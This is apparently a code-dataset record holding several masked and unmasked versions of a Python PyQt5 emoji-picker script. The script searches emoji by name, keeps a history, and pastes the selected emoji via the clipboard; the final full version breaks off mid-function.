QLineEdit.keyPressEvent(self,ev) if __name__ == '__main__': app = QApplication(sys.argv) ex = EmojiPickerWindow() sys.exit(app.exec_())
normal
{ "blob_id": "c860c1fa6e7610c60077f0eab1572895a23393fd", "index": 3725, "step-1": "<mask token>\n\n\ndef fill_grid_with_char_list(charList):\n global emojiToShowCount\n global fullRowsCount\n global lastRowEmojiCount\n emojiToShowCount = min(len(charList), emojiGridColumnCount *\n emojiGridRowCount)\n fullRowsCount = emojiToShowCount // emojiGridColumnCount\n lastRowEmojiCount = emojiToShowCount % emojiGridColumnCount\n global foundAnyEmoji\n if emojiToShowCount > 0:\n foundAnyEmoji = True\n layoutStack.setCurrentIndex(0)\n else:\n foundAnyEmoji = False\n layoutStack.setCurrentIndex(1)\n global emojiGridLayout\n for i in reversed(range(emojiGridLayout.count())):\n emojiGridLayout.itemAt(i).widget().setParent(None)\n rowIdx = 0\n colIdx = 0\n for emoji in charList:\n if rowIdx > emojiGridRowCount - 1:\n break\n label = QClickableLabel(emoji)\n label.clicked.connect(execute_emoji)\n label.setFont(font)\n label.setAlignment(Qt.AlignCenter)\n label.setMinimumHeight(49)\n emojiGridLayout.addWidget(label, rowIdx, colIdx)\n emojiGridLayout.setAlignment(label, Qt.AlignTop)\n if colIdx < emojiGridColumnCount - 1:\n colIdx += 1\n else:\n colIdx = 0\n rowIdx += 1\n emojiGridLayout.setContentsMargins(0, 0, 0, 0)\n emojiGridLayout.setHorizontalSpacing(0)\n emojiGridLayout.setVerticalSpacing(0)\n if emojiToShowCount > 0:\n highlight_emoji([0, 0])\n\n\n<mask token>\n\n\ndef emoji_hovered(hoveredLabel):\n parentGrid = hoveredLabel.parentWidget().layout()\n hoveredIndex = parentGrid.indexOf(hoveredLabel)\n hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex)\n highlight_emoji([hoveredRow, hoveredColumn])\n\n\n<mask token>\n\n\ndef on_key(key):\n if key == Qt.Key_Escape:\n quitNicely()\n\n\n<mask token>\n\n\nclass EmojiPickerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.installEventFilter(self)\n self.title = 'Emoji picker \(^o^)/'\n self.width = 281\n self.height = 251\n self.left, self.top = mousePosition()\n self.left -= self.width // 2\n self.top += 24 - self.height\n self.initSettings()\n self.initUI()\n\n def initUI(self):\n layout = QVBoxLayout()\n global layoutStack\n layoutStack = QStackedLayout()\n layoutStackWidget = QWidget()\n layoutStackWidget.setLayout(layoutStack)\n scrollArea = QScrollArea()\n gridWidget = QWidget()\n global emojiGridLayout\n emojiGridLayout = QGridLayout(gridWidget)\n emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n for col in range(emojiGridColumnCount):\n emojiGridLayout.setColumnStretch(col, 1)\n for row in range(emojiGridRowCount):\n emojiGridLayout.setRowStretch(row, 1)\n scrollArea.setWidget(gridWidget)\n scrollArea.setWidgetResizable(True)\n layoutStack.addWidget(scrollArea)\n noEmojiFoundLabel = QLabel('No emoji found 🙁')\n noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter |\n Qt.AlignVCenter)\n layoutStack.addWidget(noEmojiFoundLabel)\n layout.addWidget(layoutStackWidget)\n fill_grid_with_history()\n lineEdit = QLineEditWithArrows()\n lineEdit.textChanged.connect(execute_search)\n layout.addWidget(lineEdit)\n layout.setAlignment(lineEdit, Qt.AlignBottom)\n self.setLayout(layout)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setFixedSize(self.width, self.height)\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)\n global mainWindow\n mainWindow = self\n self.keyPressed.connect(on_key)\n self.show()\n lineEdit.setFocus()\n\n def initSettings(self):\n global settingsFile\n global historyList\n settingsFile = QSettings('emoji-picker-qtpy', 'history')\n historyList = settingsFile.value('history/history')\n keyPressed = pyqtSignal(int)\n\n def keyPressEvent(self, event):\n super(EmojiPickerWindow, self).keyPressEvent(event)\n self.keyPressed.emit(event.key())\n global willExitOnItsOwn\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.WindowDeactivate or event.type(\n ) == QEvent.FocusOut:\n if not willExitOnItsOwn:\n quitNicely()\n return False\n\n\nclass QClickableLabel(QLabel):\n clicked = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n\n def mousePressEvent(self, ev):\n self.clicked.emit(self.text())\n\n def enterEvent(self, ev):\n emoji_hovered(self)\n\n\nclass QLineEditWithArrows(QLineEdit):\n\n def keyPressEvent(self, ev):\n global selectedEmojiChar\n global foundAnyEmoji\n if ev.key() == Qt.Key_Right:\n move_selection('right')\n if ev.key() == Qt.Key_Left:\n move_selection('left')\n if ev.key() == Qt.Key_Up:\n move_selection('up')\n if ev.key() == Qt.Key_Down:\n move_selection('down')\n if ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter:\n if foundAnyEmoji:\n execute_emoji(selectedEmojiChar)\n else:\n quitNicely()\n if ev.key() == Qt.Key_Tab:\n pass\n else:\n QLineEdit.keyPressEvent(self, ev)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef quitNicely():\n mainWindow.hide()\n quit()\n\n\n<mask token>\n\n\ndef fill_grid_with_char_list(charList):\n global emojiToShowCount\n global fullRowsCount\n global lastRowEmojiCount\n emojiToShowCount = min(len(charList), emojiGridColumnCount *\n emojiGridRowCount)\n fullRowsCount = emojiToShowCount // emojiGridColumnCount\n lastRowEmojiCount = emojiToShowCount % emojiGridColumnCount\n global foundAnyEmoji\n if emojiToShowCount > 0:\n foundAnyEmoji = True\n layoutStack.setCurrentIndex(0)\n else:\n foundAnyEmoji = False\n layoutStack.setCurrentIndex(1)\n global emojiGridLayout\n for i in reversed(range(emojiGridLayout.count())):\n emojiGridLayout.itemAt(i).widget().setParent(None)\n rowIdx = 0\n colIdx = 0\n for emoji in charList:\n if rowIdx > emojiGridRowCount - 1:\n break\n label = QClickableLabel(emoji)\n label.clicked.connect(execute_emoji)\n label.setFont(font)\n label.setAlignment(Qt.AlignCenter)\n label.setMinimumHeight(49)\n emojiGridLayout.addWidget(label, rowIdx, colIdx)\n emojiGridLayout.setAlignment(label, Qt.AlignTop)\n if colIdx < emojiGridColumnCount - 1:\n colIdx += 1\n else:\n colIdx = 0\n rowIdx += 1\n emojiGridLayout.setContentsMargins(0, 0, 0, 0)\n emojiGridLayout.setHorizontalSpacing(0)\n emojiGridLayout.setVerticalSpacing(0)\n if emojiToShowCount > 0:\n highlight_emoji([0, 0])\n\n\ndef execute_search(text):\n selectedEmoji = 0, 0\n if not text or text.isspace():\n fill_grid_with_history()\n return\n foundEmoji = edp.find_by_name(text)\n charList = [emoji.char for emoji in foundEmoji]\n fill_grid_with_char_list(charList)\n\n\ndef emoji_hovered(hoveredLabel):\n parentGrid = hoveredLabel.parentWidget().layout()\n hoveredIndex = parentGrid.indexOf(hoveredLabel)\n hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex)\n highlight_emoji([hoveredRow, hoveredColumn])\n\n\n<mask token>\n\n\ndef on_key(key):\n if key == Qt.Key_Escape:\n quitNicely()\n\n\n<mask token>\n\n\nclass EmojiPickerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.installEventFilter(self)\n self.title = 'Emoji picker \(^o^)/'\n self.width = 281\n self.height = 251\n self.left, self.top = mousePosition()\n self.left -= self.width // 2\n self.top += 24 - self.height\n self.initSettings()\n self.initUI()\n\n def initUI(self):\n layout = QVBoxLayout()\n global layoutStack\n layoutStack = QStackedLayout()\n layoutStackWidget = QWidget()\n layoutStackWidget.setLayout(layoutStack)\n scrollArea = QScrollArea()\n gridWidget = QWidget()\n global emojiGridLayout\n emojiGridLayout = QGridLayout(gridWidget)\n emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n for col in range(emojiGridColumnCount):\n emojiGridLayout.setColumnStretch(col, 1)\n for row in range(emojiGridRowCount):\n emojiGridLayout.setRowStretch(row, 1)\n scrollArea.setWidget(gridWidget)\n scrollArea.setWidgetResizable(True)\n layoutStack.addWidget(scrollArea)\n noEmojiFoundLabel = QLabel('No emoji found 🙁')\n noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter |\n Qt.AlignVCenter)\n layoutStack.addWidget(noEmojiFoundLabel)\n layout.addWidget(layoutStackWidget)\n fill_grid_with_history()\n lineEdit = QLineEditWithArrows()\n lineEdit.textChanged.connect(execute_search)\n layout.addWidget(lineEdit)\n layout.setAlignment(lineEdit, Qt.AlignBottom)\n self.setLayout(layout)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setFixedSize(self.width, self.height)\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)\n global mainWindow\n mainWindow = self\n self.keyPressed.connect(on_key)\n self.show()\n lineEdit.setFocus()\n\n def initSettings(self):\n global settingsFile\n global historyList\n settingsFile = QSettings('emoji-picker-qtpy', 'history')\n historyList = settingsFile.value('history/history')\n keyPressed = pyqtSignal(int)\n\n def keyPressEvent(self, event):\n super(EmojiPickerWindow, self).keyPressEvent(event)\n self.keyPressed.emit(event.key())\n global willExitOnItsOwn\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.WindowDeactivate or event.type(\n ) == QEvent.FocusOut:\n if not willExitOnItsOwn:\n quitNicely()\n return False\n\n\nclass QClickableLabel(QLabel):\n clicked = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n\n def mousePressEvent(self, ev):\n self.clicked.emit(self.text())\n\n def enterEvent(self, ev):\n emoji_hovered(self)\n\n\nclass QLineEditWithArrows(QLineEdit):\n\n def keyPressEvent(self, ev):\n global selectedEmojiChar\n global foundAnyEmoji\n if ev.key() == Qt.Key_Right:\n move_selection('right')\n if ev.key() == Qt.Key_Left:\n move_selection('left')\n if ev.key() == Qt.Key_Up:\n move_selection('up')\n if ev.key() == Qt.Key_Down:\n move_selection('down')\n if ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter:\n if foundAnyEmoji:\n execute_emoji(selectedEmojiChar)\n else:\n quitNicely()\n if ev.key() == Qt.Key_Tab:\n pass\n else:\n QLineEdit.keyPressEvent(self, ev)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef quitNicely():\n mainWindow.hide()\n quit()\n\n\n<mask token>\n\n\ndef fill_grid_with_char_list(charList):\n global emojiToShowCount\n global fullRowsCount\n global lastRowEmojiCount\n emojiToShowCount = min(len(charList), emojiGridColumnCount *\n emojiGridRowCount)\n fullRowsCount = emojiToShowCount // emojiGridColumnCount\n lastRowEmojiCount = emojiToShowCount % emojiGridColumnCount\n global foundAnyEmoji\n if emojiToShowCount > 0:\n foundAnyEmoji = True\n layoutStack.setCurrentIndex(0)\n else:\n foundAnyEmoji = False\n layoutStack.setCurrentIndex(1)\n global emojiGridLayout\n for i in reversed(range(emojiGridLayout.count())):\n emojiGridLayout.itemAt(i).widget().setParent(None)\n rowIdx = 0\n colIdx = 0\n for emoji in charList:\n if rowIdx > emojiGridRowCount - 1:\n break\n label = QClickableLabel(emoji)\n label.clicked.connect(execute_emoji)\n label.setFont(font)\n label.setAlignment(Qt.AlignCenter)\n label.setMinimumHeight(49)\n emojiGridLayout.addWidget(label, rowIdx, colIdx)\n emojiGridLayout.setAlignment(label, Qt.AlignTop)\n if colIdx < emojiGridColumnCount - 1:\n colIdx += 1\n else:\n colIdx = 0\n rowIdx += 1\n emojiGridLayout.setContentsMargins(0, 0, 0, 0)\n emojiGridLayout.setHorizontalSpacing(0)\n emojiGridLayout.setVerticalSpacing(0)\n if emojiToShowCount > 0:\n highlight_emoji([0, 0])\n\n\ndef execute_search(text):\n selectedEmoji = 0, 0\n if not text or text.isspace():\n fill_grid_with_history()\n return\n foundEmoji = edp.find_by_name(text)\n charList = [emoji.char for emoji in foundEmoji]\n fill_grid_with_char_list(charList)\n\n\ndef emoji_hovered(hoveredLabel):\n parentGrid = hoveredLabel.parentWidget().layout()\n hoveredIndex = parentGrid.indexOf(hoveredLabel)\n hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex)\n highlight_emoji([hoveredRow, hoveredColumn])\n\n\ndef highlight_emoji(newPosition):\n global selectedEmojiPosition\n if lastRowEmojiCount == 0:\n if newPosition[0] < 0:\n newPosition[0] = fullRowsCount - 1\n elif newPosition[1] < 0:\n newPosition[1] = emojiGridColumnCount - 1\n elif newPosition[0] > fullRowsCount - 1:\n newPosition[0] = 0\n elif newPosition[1] > emojiGridColumnCount - 1:\n newPosition[1] = 0\n elif newPosition[0] < fullRowsCount and newPosition[1\n ] > emojiGridColumnCount - 1:\n newPosition[1] = 0\n elif newPosition[0] < fullRowsCount and newPosition[1] < 0:\n newPosition[1] = emojiGridColumnCount - 1\n elif newPosition[0] == fullRowsCount and newPosition[1\n ] > lastRowEmojiCount - 1 and selectedEmojiPosition[0] - newPosition[0\n ] == 0:\n newPosition[1] = 0\n elif newPosition[0] >= fullRowsCount and newPosition[1] < 0:\n newPosition[1] = lastRowEmojiCount - 1\n elif newPosition[0] > fullRowsCount and newPosition[1] < lastRowEmojiCount:\n newPosition[0] = 0\n elif newPosition[0] < 0 and newPosition[1] < lastRowEmojiCount:\n newPosition[0] = fullRowsCount\n elif newPosition[0] > fullRowsCount - 1 and newPosition[1\n ] > lastRowEmojiCount - 1:\n newPosition[0] = 0\n elif newPosition[0] < 0 and newPosition[1] > lastRowEmojiCount - 1:\n newPosition[0] = fullRowsCount - 1\n oldPosition = selectedEmojiPosition\n selectedEmojiPosition = newPosition\n widgetToDeselect = emojiGridLayout.itemAtPosition(oldPosition[0],\n oldPosition[1])\n if widgetToDeselect:\n widgetToDeselect = widgetToDeselect.widget()\n widgetToDeselect.setStyleSheet('')\n global selectedEmojiChar\n widgetToSelect = emojiGridLayout.itemAtPosition(selectedEmojiPosition[0\n ], selectedEmojiPosition[1])\n if widgetToSelect:\n widgetToSelect = widgetToSelect.widget()\n selectedEmojiChar = widgetToSelect.text()\n widgetToSelect.setStyleSheet(\n 'QLabel{background-color: palette(highlight);}')\n\n\n<mask token>\n\n\ndef on_key(key):\n if key == Qt.Key_Escape:\n quitNicely()\n\n\n<mask token>\n\n\ndef fill_grid_with_history():\n fill_grid_with_char_list(historyList)\n\n\nclass EmojiPickerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.installEventFilter(self)\n self.title = 'Emoji picker \(^o^)/'\n self.width = 281\n self.height = 251\n self.left, self.top = mousePosition()\n self.left -= self.width // 2\n self.top += 24 - self.height\n self.initSettings()\n self.initUI()\n\n def initUI(self):\n layout = QVBoxLayout()\n global layoutStack\n layoutStack = QStackedLayout()\n layoutStackWidget = QWidget()\n layoutStackWidget.setLayout(layoutStack)\n scrollArea = QScrollArea()\n gridWidget = QWidget()\n global emojiGridLayout\n emojiGridLayout = QGridLayout(gridWidget)\n emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n for col in range(emojiGridColumnCount):\n emojiGridLayout.setColumnStretch(col, 1)\n for row in range(emojiGridRowCount):\n emojiGridLayout.setRowStretch(row, 1)\n scrollArea.setWidget(gridWidget)\n scrollArea.setWidgetResizable(True)\n layoutStack.addWidget(scrollArea)\n noEmojiFoundLabel = QLabel('No emoji found 🙁')\n noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter |\n Qt.AlignVCenter)\n layoutStack.addWidget(noEmojiFoundLabel)\n layout.addWidget(layoutStackWidget)\n fill_grid_with_history()\n lineEdit = QLineEditWithArrows()\n lineEdit.textChanged.connect(execute_search)\n layout.addWidget(lineEdit)\n layout.setAlignment(lineEdit, Qt.AlignBottom)\n self.setLayout(layout)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setFixedSize(self.width, self.height)\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)\n global mainWindow\n mainWindow = self\n self.keyPressed.connect(on_key)\n self.show()\n lineEdit.setFocus()\n\n def initSettings(self):\n global settingsFile\n global historyList\n settingsFile = QSettings('emoji-picker-qtpy', 'history')\n historyList = settingsFile.value('history/history')\n keyPressed = pyqtSignal(int)\n\n def keyPressEvent(self, event):\n super(EmojiPickerWindow, self).keyPressEvent(event)\n self.keyPressed.emit(event.key())\n global willExitOnItsOwn\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.WindowDeactivate or event.type(\n ) == QEvent.FocusOut:\n if not willExitOnItsOwn:\n quitNicely()\n return False\n\n\nclass QClickableLabel(QLabel):\n clicked = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n\n def mousePressEvent(self, ev):\n self.clicked.emit(self.text())\n\n def enterEvent(self, ev):\n emoji_hovered(self)\n\n\nclass QLineEditWithArrows(QLineEdit):\n\n def keyPressEvent(self, ev):\n global selectedEmojiChar\n global foundAnyEmoji\n if ev.key() == Qt.Key_Right:\n move_selection('right')\n if ev.key() == Qt.Key_Left:\n move_selection('left')\n if ev.key() == Qt.Key_Up:\n move_selection('up')\n if ev.key() == Qt.Key_Down:\n move_selection('down')\n if ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter:\n if foundAnyEmoji:\n execute_emoji(selectedEmojiChar)\n else:\n quitNicely()\n if ev.key() == Qt.Key_Tab:\n pass\n else:\n QLineEdit.keyPressEvent(self, ev)\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef quitNicely():\n mainWindow.hide()\n quit()\n\n\ndef mousePosition():\n pointerData = display.Display().screen().root.query_pointer()._data\n return pointerData['root_x'], pointerData['root_y']\n\n\ndef execute_emoji(char):\n add_char_to_history(char)\n global willExitOnItsOwn\n willExitOnItsOwn = True\n mainWindow.hide()\n QApplication.clipboard().setText(char)\n pyautogui.hotkey('ctrl', 'v')\n QtTest.QTest.qWait(250)\n quit()\n\n\ndef fill_grid_with_char_list(charList):\n global emojiToShowCount\n global fullRowsCount\n global lastRowEmojiCount\n emojiToShowCount = min(len(charList), emojiGridColumnCount *\n emojiGridRowCount)\n fullRowsCount = emojiToShowCount // emojiGridColumnCount\n lastRowEmojiCount = emojiToShowCount % emojiGridColumnCount\n global foundAnyEmoji\n if emojiToShowCount > 0:\n foundAnyEmoji = True\n layoutStack.setCurrentIndex(0)\n else:\n foundAnyEmoji = False\n layoutStack.setCurrentIndex(1)\n global emojiGridLayout\n for i in reversed(range(emojiGridLayout.count())):\n emojiGridLayout.itemAt(i).widget().setParent(None)\n rowIdx = 0\n colIdx = 0\n for emoji in charList:\n if rowIdx > emojiGridRowCount - 1:\n break\n label = QClickableLabel(emoji)\n label.clicked.connect(execute_emoji)\n label.setFont(font)\n label.setAlignment(Qt.AlignCenter)\n label.setMinimumHeight(49)\n emojiGridLayout.addWidget(label, rowIdx, colIdx)\n emojiGridLayout.setAlignment(label, Qt.AlignTop)\n if colIdx < emojiGridColumnCount - 1:\n colIdx += 1\n else:\n colIdx = 0\n rowIdx += 1\n emojiGridLayout.setContentsMargins(0, 0, 0, 0)\n emojiGridLayout.setHorizontalSpacing(0)\n emojiGridLayout.setVerticalSpacing(0)\n if emojiToShowCount > 0:\n highlight_emoji([0, 0])\n\n\ndef execute_search(text):\n selectedEmoji = 0, 0\n if not text or text.isspace():\n fill_grid_with_history()\n return\n foundEmoji = edp.find_by_name(text)\n charList = [emoji.char for emoji in foundEmoji]\n fill_grid_with_char_list(charList)\n\n\ndef emoji_hovered(hoveredLabel):\n parentGrid = hoveredLabel.parentWidget().layout()\n hoveredIndex = parentGrid.indexOf(hoveredLabel)\n hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex)\n highlight_emoji([hoveredRow, hoveredColumn])\n\n\ndef highlight_emoji(newPosition):\n global selectedEmojiPosition\n if lastRowEmojiCount == 0:\n if newPosition[0] < 0:\n newPosition[0] = fullRowsCount - 1\n elif newPosition[1] < 0:\n newPosition[1] = emojiGridColumnCount - 1\n elif newPosition[0] > fullRowsCount - 1:\n newPosition[0] = 0\n elif newPosition[1] > emojiGridColumnCount - 1:\n newPosition[1] = 0\n elif newPosition[0] < fullRowsCount and newPosition[1\n ] > emojiGridColumnCount - 1:\n newPosition[1] = 0\n elif newPosition[0] < fullRowsCount and newPosition[1] < 0:\n newPosition[1] = emojiGridColumnCount - 1\n elif newPosition[0] == fullRowsCount and newPosition[1\n ] > lastRowEmojiCount - 1 and selectedEmojiPosition[0] - newPosition[0\n ] == 0:\n newPosition[1] = 0\n elif newPosition[0] >= fullRowsCount and newPosition[1] < 0:\n newPosition[1] = lastRowEmojiCount - 1\n elif newPosition[0] > fullRowsCount and newPosition[1] < lastRowEmojiCount:\n newPosition[0] = 0\n elif newPosition[0] < 0 and newPosition[1] < lastRowEmojiCount:\n newPosition[0] = fullRowsCount\n elif newPosition[0] > fullRowsCount - 1 and newPosition[1\n ] > lastRowEmojiCount - 1:\n newPosition[0] = 0\n elif newPosition[0] < 0 and newPosition[1] > lastRowEmojiCount - 1:\n newPosition[0] = fullRowsCount - 1\n oldPosition = selectedEmojiPosition\n selectedEmojiPosition = newPosition\n widgetToDeselect = emojiGridLayout.itemAtPosition(oldPosition[0],\n oldPosition[1])\n if widgetToDeselect:\n widgetToDeselect = widgetToDeselect.widget()\n widgetToDeselect.setStyleSheet('')\n global selectedEmojiChar\n widgetToSelect = emojiGridLayout.itemAtPosition(selectedEmojiPosition[0\n ], selectedEmojiPosition[1])\n if widgetToSelect:\n widgetToSelect = widgetToSelect.widget()\n selectedEmojiChar = widgetToSelect.text()\n widgetToSelect.setStyleSheet(\n 'QLabel{background-color: palette(highlight);}')\n\n\n<mask token>\n\n\ndef on_key(key):\n if key == Qt.Key_Escape:\n quitNicely()\n\n\ndef add_char_to_history(char):\n global settingsFile\n global historyList\n if not historyList:\n historyList = [char]\n else:\n if char in historyList:\n historyList.remove(char)\n tempList = [char]\n tempList.extend(historyList)\n historyList = tempList[:emojiGridColumnCount * emojiGridRowCount]\n settingsFile.setValue('history/history', historyList)\n\n\ndef fill_grid_with_history():\n fill_grid_with_char_list(historyList)\n\n\nclass EmojiPickerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.installEventFilter(self)\n self.title = 'Emoji picker \(^o^)/'\n self.width = 281\n self.height = 251\n self.left, self.top = mousePosition()\n self.left -= self.width // 2\n self.top += 24 - self.height\n self.initSettings()\n self.initUI()\n\n def initUI(self):\n layout = QVBoxLayout()\n global layoutStack\n layoutStack = QStackedLayout()\n layoutStackWidget = QWidget()\n layoutStackWidget.setLayout(layoutStack)\n scrollArea = QScrollArea()\n gridWidget = QWidget()\n global emojiGridLayout\n emojiGridLayout = QGridLayout(gridWidget)\n emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n for col in range(emojiGridColumnCount):\n emojiGridLayout.setColumnStretch(col, 1)\n for row in range(emojiGridRowCount):\n emojiGridLayout.setRowStretch(row, 1)\n scrollArea.setWidget(gridWidget)\n scrollArea.setWidgetResizable(True)\n layoutStack.addWidget(scrollArea)\n noEmojiFoundLabel = QLabel('No emoji found 🙁')\n noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter |\n Qt.AlignVCenter)\n layoutStack.addWidget(noEmojiFoundLabel)\n layout.addWidget(layoutStackWidget)\n fill_grid_with_history()\n lineEdit = QLineEditWithArrows()\n lineEdit.textChanged.connect(execute_search)\n layout.addWidget(lineEdit)\n layout.setAlignment(lineEdit, Qt.AlignBottom)\n self.setLayout(layout)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setFixedSize(self.width, self.height)\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)\n global mainWindow\n mainWindow = self\n self.keyPressed.connect(on_key)\n self.show()\n lineEdit.setFocus()\n\n def initSettings(self):\n global settingsFile\n global historyList\n settingsFile = QSettings('emoji-picker-qtpy', 'history')\n historyList = settingsFile.value('history/history')\n keyPressed = pyqtSignal(int)\n\n def keyPressEvent(self, event):\n super(EmojiPickerWindow, self).keyPressEvent(event)\n self.keyPressed.emit(event.key())\n global willExitOnItsOwn\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.WindowDeactivate or event.type(\n ) == QEvent.FocusOut:\n if not willExitOnItsOwn:\n quitNicely()\n return False\n\n\nclass QClickableLabel(QLabel):\n clicked = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n\n def mousePressEvent(self, ev):\n self.clicked.emit(self.text())\n\n def enterEvent(self, ev):\n emoji_hovered(self)\n\n\nclass QLineEditWithArrows(QLineEdit):\n\n def keyPressEvent(self, ev):\n global selectedEmojiChar\n global foundAnyEmoji\n if ev.key() == Qt.Key_Right:\n move_selection('right')\n if ev.key() == Qt.Key_Left:\n move_selection('left')\n if ev.key() == Qt.Key_Up:\n move_selection('up')\n if ev.key() == Qt.Key_Down:\n move_selection('down')\n if ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter:\n if foundAnyEmoji:\n execute_emoji(selectedEmojiChar)\n else:\n quitNicely()\n if ev.key() == Qt.Key_Tab:\n pass\n else:\n QLineEdit.keyPressEvent(self, ev)\n\n\n<mask token>\n", "step-5": "#!/usr/bin/python\n# Copyright (c) 2020 Maryushi3\n\nimport emoji_data_python as edp\nimport sys\nimport pyautogui\nfrom Xlib import display\nfrom PyQt5.QtWidgets import QApplication, QGridLayout, QLabel, QLineEdit, QScrollArea, QSizePolicy, QStackedLayout, QVBoxLayout, QWidget\nfrom PyQt5.QtCore import QEvent, QSettings, Qt, pyqtSignal\nfrom PyQt5.QtGui import QFont\nfrom PyQt5 import QtTest\n\n\n# globals\nemojiGridLayout = None\nmainWindow = None\nemojiGridColumnCount = 5\nemojiGridRowCount = 4\nemojiToShowCount = 0\nfullRowsCount = 0\nlastRowEmojiCount = 0\nemojiFontSize = 20\nselectedEmojiPosition = list((0,0))\nwillExitOnItsOwn = False\nselectedEmojiChar=''\nsettingsFile = None\nhistoryList = []\nfoundAnyEmoji = True\nlayoutStack = None\n\nfont = QFont()\nfont.setPointSize(emojiFontSize)\n\n# quits without a lag\ndef quitNicely():\n mainWindow.hide()\n quit()\n\n# gets mouse position from Xlib\ndef mousePosition():\n pointerData = display.Display().screen().root.query_pointer()._data\n return pointerData[\"root_x\"], pointerData[\"root_y\"]\n\n# copies and pastes selected emoji\ndef execute_emoji(char):\n add_char_to_history(char)\n global willExitOnItsOwn\n willExitOnItsOwn = True\n mainWindow.hide()\n QApplication.clipboard().setText(char)\n pyautogui.hotkey(\"ctrl\",\"v\")\n QtTest.QTest.qWait(250)\n quit()\n\n# fills grid with given char list and takes care of layout and counting\ndef fill_grid_with_char_list(charList):\n\n # for wraparound\n global emojiToShowCount\n global fullRowsCount\n global lastRowEmojiCount\n emojiToShowCount = min(len(charList),(emojiGridColumnCount*emojiGridRowCount))\n fullRowsCount = emojiToShowCount//emojiGridColumnCount\n lastRowEmojiCount = emojiToShowCount%emojiGridColumnCount\n \n global foundAnyEmoji\n if emojiToShowCount>0:\n foundAnyEmoji = True\n layoutStack.setCurrentIndex(0)\n else:\n foundAnyEmoji = False\n layoutStack.setCurrentIndex(1)\n\n\n # clear grid\n global emojiGridLayout\n for i in reversed(range(emojiGridLayout.count())): \n emojiGridLayout.itemAt(i).widget().setParent(None)\n\n # fill with new chars\n rowIdx = 0\n colIdx = 0\n for emoji in charList:\n if rowIdx>emojiGridRowCount-1:\n break;\n\n label = QClickableLabel(emoji)\n label.clicked.connect(execute_emoji)\n label.setFont(font)\n label.setAlignment(Qt.AlignCenter)\n label.setMinimumHeight(49)\n emojiGridLayout.addWidget(label,rowIdx,colIdx)\n emojiGridLayout.setAlignment(label,Qt.AlignTop)\n if colIdx < emojiGridColumnCount-1:\n colIdx+=1\n else:\n colIdx=0\n rowIdx+=1\n\n emojiGridLayout.setContentsMargins(0,0,0,0)\n emojiGridLayout.setHorizontalSpacing(0)\n emojiGridLayout.setVerticalSpacing(0)\n\n if emojiToShowCount>0:\n highlight_emoji([0,0])\n\n# searches for emoji, and passes them to fill_grid_with_char_list\ndef execute_search(text):\n selectedEmoji = (0,0)\n if not text or text.isspace():\n fill_grid_with_history()\n return\n\n foundEmoji = edp.find_by_name(text)\n charList = [emoji.char for emoji in foundEmoji]\n\n fill_grid_with_char_list(charList)\n\n# handles what to do after hovering over a given label\ndef emoji_hovered(hoveredLabel):\n parentGrid = hoveredLabel.parentWidget().layout()\n hoveredIndex = parentGrid.indexOf(hoveredLabel)\n hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex)\n highlight_emoji([hoveredRow,hoveredColumn])\n\n# selects, sets style and handles wraparound\ndef highlight_emoji(newPosition):\n global selectedEmojiPosition\n\n # grid is filled to a full rectangle (last row fills the window horizontally)\n if lastRowEmojiCount==0:\n if newPosition[0]<0:\n newPosition[0]=fullRowsCount-1\n elif newPosition[1]<0:\n newPosition[1]=emojiGridColumnCount-1\n elif newPosition[0]>fullRowsCount-1:\n newPosition[0]=0\n elif newPosition[1]>emojiGridColumnCount-1:\n newPosition[1]=0\n # last row is not full\n else:\n #horizontal wraparound through RIGHT edge for full rows\n if (newPosition[0]<fullRowsCount) and (newPosition[1]>emojiGridColumnCount-1):\n newPosition[1]=0\n #horizontal wraparound through LEFT edge for full rows\n elif (newPosition[0]<fullRowsCount) and (newPosition[1]<0):\n newPosition[1]=emojiGridColumnCount-1\n #horizontal wraparound through right edge for NON FULL rows\n elif (newPosition[0]==fullRowsCount) and (newPosition[1]>lastRowEmojiCount-1) and 